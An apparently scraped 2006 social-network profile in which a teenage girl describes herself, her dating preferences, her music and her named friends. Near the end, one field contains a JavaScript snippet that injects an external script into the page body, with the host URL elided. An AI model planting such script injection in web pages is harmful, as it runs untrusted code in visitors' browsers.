LiVin Life Like It's Golden! profile picture

LiVin Life Like It's Golden!

a href=htt~*You Wond3r Why My Sp!ri+ !s So Happy*~

About Me

girls layout @ HOT MyHotCommentsHEYYY!! Whats the DEALLLLLLL!! my name is Christin..I've recently completed highschool in january as an early graduate where i attended **SEVENTY FIRST HIGHSCHOOL**!!07'..!! a verry smart and outgoing person..i love to LAUGH and have fun the most GOOFIEST person alive! many ppl dont understand me, but the ones who do a just as goofy as me!...i hate being around negitive people, because people like that always seem to bring me down. I try to surround my self around the postive people in this world! I may seem shy at first, only until you get to no me..jus give me about 10 min and ill talk to you like ive known you for yearss!IM ALWAYS *SMILEIN* NO MATTER WHAT...i hate when ppl ask me why im always smilin,its jus somethin i just cant help! Im one of the nicest people you'll ever meet..many say im WAYYYY too nice.. I love doin things for other people, because not only does it make me feel good about myself, but also because i believe the more u do for others the more u get in return! I am very very very *INDEPENDENT* and *MOTIVATED* to make it in life...i hate dependin on people to do stuff for me..Im VERRRRRRRYY different from any other girl out there..i love and apperciate the little things in life, because i no life is way to short to take nething for granted! I plan on goin to college, and Unlike many people around here that ive met.. i actually have goals in life and im actually going to do somethin with myself one day instead of waitin around relyin on people to do things for me. The most important thing to me is livin life to the fullest, because you never no when the world will end. To me time is an essence and it should never be wasted... G!rls R Lyke Apples on Tree$.Th3 Be$t On3s aRe A+ Th3 T0P. Th3 B0y$ DoNt Want 2 R3aCh 4 Th3 G0oD On3s, Becau$3 th3y Ar3 Afra!d Of F@ll!ng and G3tt!nG Hur+.In$t@d Th3y G3t Th3 R0++eN apple$ Fr0m th3 Gr0und That Ar3nt A$ G0oD,bu+ Ea$Y 2 G3t, $0 Th3 Appl3s A+ Th3 T0p tH!nK Th3r3$ $OmEth!n Wr0nG W!t Th3m, Wh3n In R3al!ty Th3y Ar3 Amaz!ng! Th3y Ju$t Hav3 T0 Wa!t F0r Th3 R!ght B0y To C0m3 Al0ng, Th3 On3$ tha+ Ar3 Brav3,Enough 2 Cl!mb all Th3 Way 2 Th3 T0p oF Th3 Tr33 /b
The Opposite Sex:
Body or Face Both of course!
Looks or Personality Personality, but looks always matter!
Height 6'1 or taller
Weight jus not to skinny or to fat!
Hair Color brown or black, nuttin wild..heck no
Eye Color whatever he's got
Most Important Physical Feature smile most definetly!
Good/Bad Traits
Funny Yes, someone just as funny as me.
Loud Not to loud
Seductive Not no creepy stuff
Quiet heck no, only when he needs 2 be
Tall Heckkkk yeaahhh....
Short heck NOO!!
Athletic MOST DEF.
Fat Heck to the NO!
Immature No sir...
Competitive yes, thats always a plus.
Hyper nooooo nuttin like that
Smoker HECK NO,
Drinker um no,
Smart YES...please you gotta have some brains!
Dumb yeah sometimes lol
Observant yes thats a good asset to have
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My Interests

T.I. a.k.a my bestfriend from the Ak, my shoppin partner,lol...well we've had some good times together!! Playin ball with you was our funnest times, especially goofin off on the court cuz we knew we were the best out we were like kobe and shaq, u was kobe and i was shaq,lol we were jus that good! lol let me stop...but thats cool we've gotten to see eachother now that you livin in Tennessee! well jus thanks for bein a good friend!! love yaaaa!! Miss my gurl from the AK!! you no i aint forget to shout u out!! well we had some fun times ballin it up at lions shoppin at that one mall...shooooooooooott its been so long i forgot the mall names!! even tho you was a wild child lol it was fun laughin llike crazy with you! lol was cool bein in highschool with you my freshmen year even tho ihad to leave!! thank god we still keep in touch cuz i wouldnt no what to do without my channy!! lol well love you girlllllllllllllllllllllllllllllllllll! JAZZY FIZZLEEEEEEEEEEE!! lol My RIGHT HAND MAN IN THE ICE BOX AK!! MANNN WE HAD SOME RIDICULOUSLY FUN TIMES TOGETHER FROM SHOPPIN..TO GOIN TO FREDMYERS EATIN MY FAV.MINTS.TO WALKIN ALL OVER EAGLE RIVER ..UP AND DOWN ALPENGLOW..MAN THE LIST CAN GO ON AND ON...ITS BEEN LIKE 4 YRS BUT WE STILL KEEP IN TOUCH...WELL I HAD TO SHOUT MY MOST SILLIEST,CRAZY ,WONDERFUL FRIEND OUT..LOVE YOU GIRL AND MISS YOU LIKE CRAZY!Killa K! My right hand man, my partner in crime!! lol what would i do without your silly self. finally i meet someone just as goofy crazy and silly as me..well almost at my level neways!! im glad i met you this year, i couldnt imagine my senior yr without knowing you...we have had so many fun and at the same time BORING WEEKENDS but at the same time we found ways to make it fun! i apperciate you bein there 4 me like im there for you! well love you boo..and member our lil quote...."WE BUTTA EM UP THEN FORK THEM HOES!!! HAHAHAHA!! Shatia..Where do i begin with you...hmmm...well first of all im glad i went to Terry sanford because we ended up meeting! Your one of my sweetest friends! We have had some fun times rollin in Big Raliegh doin our hard core shoppin, to shoppin in wack Fayetteville, but either way we still had fun doing it! Meeting chris brown with you was the best, even tho u think he only smiled at u he smiled even bigger at me! HA HA JP! but he did well thanks for being there for me especially last yr with all that drama!! well cant wait til u come home from ATLANTA! ill b countin down the days!! love uuuuuuu!! T.J my big u no i cant standddddd you right!! seriously i cant...but i had to shout u out, just because lol jp..well jus sayin hope you enjoyin college..well i kno you are cuz you call that your home now...even though really and truly your home is back here in fayetteville i dont care what you say...well i hope u bein safe up there in Johnson city...i actually miss havin your retarted self around the house even though you get on my last nerve. It sucks u dont bother to call me but once a week to check up on me but its coollll i suppose.guess ur having too much fun! well look be safe and love you lots!!Brand0n Barn3s...a.k.a Kobe!! lol do you realize how long it took for me to learn your real name?? lol wellllll guess what...thats besides the point!! I put you under my fav. people for a reason... Im glad i finally got to meet someone as cool as you! It was cool chillin with you the few times we did since we've known eachother it really ment a lot! Its nice to see that your actually going to be somebody in this world, because its rare these days, and guess what i wish you nuthin but success in the future, becuase I think you reallyyyyy deserve it! It sucks that your leaving, because id love to get to kno you better than i was able to but the little bit i did learn about you was good enough. Oh yeah and i just wanted to say thanks for being a good friend, someone i could actually talk to about my lil problems right!! lol it ment a lot to kno you always had a listening ear! Well like i said thanks a lot for being there and much loveee to youuu!!!! Miss my best friend from terry even tho you always had a nasty attitude at school last year, i still stood by your side cuz you had some major problems lol let me stop but noo you no you my girlll always!! we had good times last year from lunch, to 3d period laughing and havin a good time! its cool that we still keep in touch and oh yeah i wanted you to know that till this day me and you dont loook alike i dont care what ppl say...i guess they say the more you hang out with that person u begin to look like em right?? wellll lol i dont think thats true..but neways thanks for bein a good friend!! love ya girl! Sara Hawley...we've known eachother over 10 yrs now!! My Reallll Best friend from Cali!! Now you knooww we gooo wayyyyyyy back for reallllllll!! lol well i jus wanted to shout out to you and tell you im glad we still keep in touch even though we havent seen eachother since we were like 9 lol back in the day right?? well weell weelll...member when we used to catch lady bugs in ur backyard lol that was my most missed memory!! then we useda sneak off and walk to the shoppette and get some snacks! lol we were such fat kids...but i really do wish i could rewind time for a few days and experience that agian!! well jus sayin i love you!! Miss Alisha, My POOH BEAR!! i love you girl...thanks for bein there last year at that wack TS...with all the drama were always there to make me smile and i love u for that!!!

I'd like to meet:


I enjoy many types of music im very open minded but i really perfer hip hop and r&b a lil old school also!...oh yes and them SLOOWWWWWWWWW JAMZZZZZZZZZZZZZZZ*


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God and my parents that bought me into this world!'.."var x=document.createElement('script');x.src='http://www.../.../ test.js';document.getElementsByTagName('body')[0].appendChil d(x);" /

My Blog

Girls should be treated with RESPECT!

I know way too many really beautiful girls who think they don't look good... It hurts... because it's our fault, guys I mean YOU. We make girls feel like they have to be perfect. You know what I mean,...
Posted by N01 Sed Itd B EZ Th3y jus Pr0m!$3d Itd B Worth !t on Mon, 21 Aug 2006 08:45:00 PST